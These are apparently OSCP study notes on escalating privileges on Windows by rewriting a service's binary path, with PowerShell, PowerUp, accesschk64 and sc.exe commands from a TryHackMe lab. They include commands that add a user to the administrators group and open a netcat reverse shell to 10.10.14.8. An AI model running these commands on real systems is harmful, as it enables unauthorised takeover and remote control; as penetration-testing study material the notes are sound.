// notes/ PrivEsc — Windows
🪟

Service Permissions Binary Paths

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/service-permissions_binary-paths

Binary Paths

Overview

Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.

Exploitation via Powershell

View services

code
01Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions

code
01icacls "C:\xampp\apache\bin\mysqld.exe"
<table><thead><tr><th width="133">Mask</th><th>Permissions</th></tr></thead><tbody><tr><td>F</td><td>Full access</td></tr><tr><td>M</td><td>Modify access</td></tr><tr><td>RX</td><td>Read and execute access</td></tr><tr><td>R</td><td>Read-only access</td></tr><tr><td>W</td><td>Write-only access</td></tr></tbody></table>

Replace service binary with malicious one then restart service

code
01Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
02net stop mysql
03net start mysql
04shutdown /r /t 0

Exploitation using PowerUp

Run PowerUp on machine

powerquery
01. .\PowerUp.ps1
02Invoke-AllChecks
<figure><img src="/files/9OyK3ubE3rgWjbQHj4qQ" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

Change the binary path

powerquery
01sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
02sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"

Start service

powerquery
01sc.exe start dacl

Exploitation via Accesschk64

Check for services with write permissions

code
01accesschk64.exe --accept-eula -uwcv Everyone *
<figure><img src="/files/Zj5d3eQv0PFDyZn25C46" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>
code
01accesschk64.exe -uwcv daclsvc
<figure><img src="/files/Azm098szRD9lItKXsNra" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

Query the service

powerquery
01sc qc daclsvc
<figure><img src="/files/I7VhqgAYTcqeIH4PRRr7" alt=""><figcaption><p>TCM Windows Priv Esc on Try Hack Me</p></figcaption></figure>

Changing the binary path is the same as the last method